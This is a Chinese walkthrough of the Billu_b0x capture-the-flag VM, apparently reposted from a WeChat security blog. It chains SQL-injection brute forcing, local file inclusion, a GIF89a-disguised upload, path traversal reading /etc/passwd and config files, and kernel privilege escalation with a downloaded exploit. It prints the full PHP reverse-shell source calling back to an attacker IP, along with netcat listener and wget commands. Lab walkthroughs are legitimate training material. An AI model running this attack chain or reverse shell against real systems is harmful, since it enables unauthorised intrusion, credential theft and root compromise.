内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现 端口扫描 WEB信息收集
SQL注入(SQLMAP跑不出来)
文件包含漏洞 文件上传漏洞
任意文件下载 源码审计
内核漏洞提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap
-p-
192
.168
.112
.130
nmap
-p22
,80
-sV
-sC
192
.168
.112
.130
Starting
Nmap 7.92 ( https://nmap.org ) at 2022-11-09 05:11 EST
Nmap
scan report for 192.168.112.130
Host
is up (0.00069s latency).
PORT
STATE SERVICE VERSION
open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
open http Apache httpd 2.2.22 ((Ubuntu))
http-cookie-flags:
/:
PHPSESSID:
httponly flag not set
:
--==[[IndiShell Lab]]==--
:
Apache/2.2.22 (Ubuntu)
MAC
Address: 00:0C:29:0B:39:35 (VMware)
Service
Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service
detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap
done: 1 IP address (1 host up) scanned in 7.42 seconds
1.3 SQL注入
对该网址进行http://192.168.112.130/访问
发现需要用到sql注入
抓包得到
POST
/
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 65
Origin
: http://192.168.112.130
Connection
: close
Referer
: http://192.168.112.130/
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
un=§
123
§&ps=§
123
§&login=%E8%AE%A9%E6%88%91%E4%BB%AC%E7%99%BB%E9%99%86
在un和ps同时爆破sql注入密码字典尝试
un:/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt字典路径
ps:字典为burp自带sql字典
参数2用burp自带字典
开始爆破出现302处注入成功
重放请求包到浏览器
跳转到http://192.168.112.130/panel.php
1.4 文件包含+文件上传
dirsearch -u http://192.168.112.130
访问该网址打开
http://192.168.112.130/add.php
有点像上传文件的接口
抓包测试
POST
/panel.php
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 36
Origin
: http://192.168.112.130
Connection
: close
Referer
: http://192.168.112.130/panel.php
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
load=add&
continue
=%E7%BB%A7%E7%BB%AD
存在加载
add
.php文件,存在文件包含修改
add
的话,就访问不到那个上传文件接口
修改为
../../../../../../../../../../etc/passwd
加载passwd文件存在文件包含
POST
/panel.php
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 73
Origin
: http://192.168.112.130
Connection
: close
Referer
: http://192.168.112.130/panel.php
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
load=../../../../../../../../../../etc/passwd&
continue
=%E7%BB%A7%E7%BB%AD
打开
http://192.168.112.130/panel.php
文件上传接口
当我上传一个php文件时发现不可以上传
抓包查看
POST
/panel.php
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: multipart/form-data; boundary=---------------------------10474904140937799821346063474
Content-Length
: 715
Origin
: http://192.168.112.130
Connection
: close
Referer
: http://192.168.112.130/panel.php
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
-----------------------------
10474904140937799821346063474
Content-Disposition: form-
data
; name=
"image"
; filename=
"1.png"
Content-Type: image/png
GIF89a
<?php
;?>
-----------------------------
10474904140937799821346063474
Content-Disposition: form-
data
; name=
"name"
name123
-----------------------------
10474904140937799821346063474
Content-Disposition: form-
data
; name=
"address"
address
-----------------------------
10474904140937799821346063474
Content-Disposition: form-
data
; name=
"id"
1337
-----------------------------
10474904140937799821346063474
Content-Disposition: form-
data
; name=
"upload"
上传
-----------------------------
10474904140937799821346063474
--
修改为以上请求包即可上传成功!
上传一个反弹shell
cp /usr/share/webshells/php/php-
reverse
-shell.php .
mv php-
reverse
-shell.php
123
.png
// 需要修改 反弹代理 里面 ip
POST
/panel.php
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: multipart/form-data; boundary=---------------------------31115094725966488031053493073
Content-Length
: 6193
Origin
: http://192.168.112.130
Connection
: close
Referer
: http://192.168.112.130/panel.php
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
----------------------------
-31115094725966488031053493073
Content-Disposition: form-data; name=
"image"
; filename=
"123.png"
Content-Type: image/png
GIF89a;
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at [email protected]
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (
0
);
$VERSION =
"1.0"
;
$ip =
'192.168.112.128'
;
// CHANGE THIS
$port =
1234
;
// CHANGE THIS
$chunk_size =
1400
;
$write_a =
null
;
$error_a =
null
;
$shell =
'uname -a; w; id; /bin/sh -i'
;
$daemon =
0
;
$debug =
0
;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if
(function_exists(
'pcntl_fork'
)) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if
($pid ==
-1
) {
printit(
"ERROR: Can't fork"
);
exit
(
1
);
}
if
($pid) {
exit
(
0
);
// Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if
(posix_setsid() ==
-1
) {
printit(
"Error: Can't setsid()"
);
exit
(
1
);
}
$daemon =
1
;
}
else
{
printit(
"WARNING: Failed to daemonise. This is quite common and not fatal."
);
}
// Change to a safe directory
chdir(
"/"
);
// Remove any umask we inherited
umask(
0
);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr,
30
);
if
(!$sock) {
printit(
"$errstr ($errno)"
);
exit
(
1
);
}
// Spawn shell process
$descriptorspec =
array
(
0
=>
array
(
"pipe"
,
"r"
),
// stdin is a pipe that the child will read from
1
=>
array
(
"pipe"
,
"w"
),
// stdout is a pipe that the child will write to
2
=>
array
(
"pipe"
,
"w"
)
// stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if
(!is_resource($process)) {
printit(
"ERROR: Can't spawn shell"
);
exit
(
1
);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[
0
],
0
);
stream_set_blocking($pipes[
1
],
0
);
stream_set_blocking($pipes[
2
],
0
);
stream_set_blocking($sock,
0
);
printit(
"Successfully opened reverse shell to $ip:$port"
);
while
(
1
) {
// Check for end of TCP connection
if
(feof($sock)) {
printit(
"ERROR: Shell connection terminated"
);
break
;
}
// Check for end of STDOUT
if
(feof($pipes[
1
])) {
printit(
"ERROR: Shell process terminated"
);
break
;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a =
array
($sock, $pipes[
1
], $pipes[
2
]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a,
null
);
// If we can read from the TCP socket, send
// data to process's STDIN
if
(in_array($sock, $read_a)) {
if
($debug) printit(
"SOCK READ"
);
$input = fread($sock, $chunk_size);
if
($debug) printit(
"SOCK: $input"
);
fwrite($pipes[
0
], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if
(in_array($pipes[
1
], $read_a)) {
if
($debug) printit(
"STDOUT READ"
);
$input = fread($pipes[
1
], $chunk_size);
if
($debug) printit(
"STDOUT: $input"
);
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if
(in_array($pipes[
2
], $read_a)) {
if
($debug) printit(
"STDERR READ"
);
$input = fread($pipes[
2
], $chunk_size);
if
($debug) printit(
"STDERR: $input"
);
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[
0
]);
fclose($pipes[
1
]);
fclose($pipes[
2
]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function
printit
($string)
{
if
(!$daemon) {
"$stringn"
;
}
}
----------------------------
-31115094725966488031053493073
Content-Disposition: form-data; name=
"name"
name111111
----------------------------
-31115094725966488031053493073
Content-Disposition: form-data; name=
"address"
address
----------------------------
-31115094725966488031053493073
Content-Disposition: form-data; name=
"id"
123123
----------------------------
-31115094725966488031053493073
Content-Disposition: form-data; name=
"upload"
上传
----------------------------
-31115094725966488031053493073
--
利用文件包含读取
POST
/panel.php
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 62
Origin
: http://192.168.112.130
Connection
: close
Referer
: http://192.168.112.130/panel.php
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
load=
/uploaded_images/
123
.png&
continue
=%E7%BB%A7%E7%BB%AD
在kali上启动反弹
nc
-lvnp
1234
成功!!
1.5 提权
内核漏洞提权
python -c "import pty;pty.spawn('/bin/bash')"
uname -a
根据这个内核版本可以找到内核漏洞代码
cp /usr/share/exploitdb/exploits/linux/local/37292.c .
mv 37292.c exp.c
python3 -m http.server 80
cd /tmp
wget http://192.168.112.128/exp.c
gcc exp.c -o exp
chmod +x exp
./exp
提权成功
任意文件下载
dirsearch -u http://192.168.112.13
http://192.168.112.130/test
发现缺少个file参数
需要用到POST方法提交于是抓包
GET /test?file=../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
使用Change request method
POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
file=../../../../../../../etc/passwd
从index.php中读取出来了c.php
POST /test HTTP/1.1
Host: 192.168.112.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
file=c.php
数据库的 账号密码
billu b0x_billu
http://192.168.112.130/phpmy/
访问上述网址利用账号密码登录
发现账号密码 biLLu hEx_it
web爬取
dirsearch -u http:
//192.168.112.130/phpmy/
读取phpmy/config.inc.php文件内容
POST
/test
HTTP/1.1
Host
: 192.168.112.130
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Connection
: close
Cookie
: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0od
Upgrade-Insecure-Requests
: 1
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 25
file
=phpmy/config.inc.php
得到账号密码 root roottoor
ssh
root
@
192
.
168
.
112
.
130
//密码 roottoor
成功
注:如有侵权请后台联系进行删除
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Billu_b0x靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论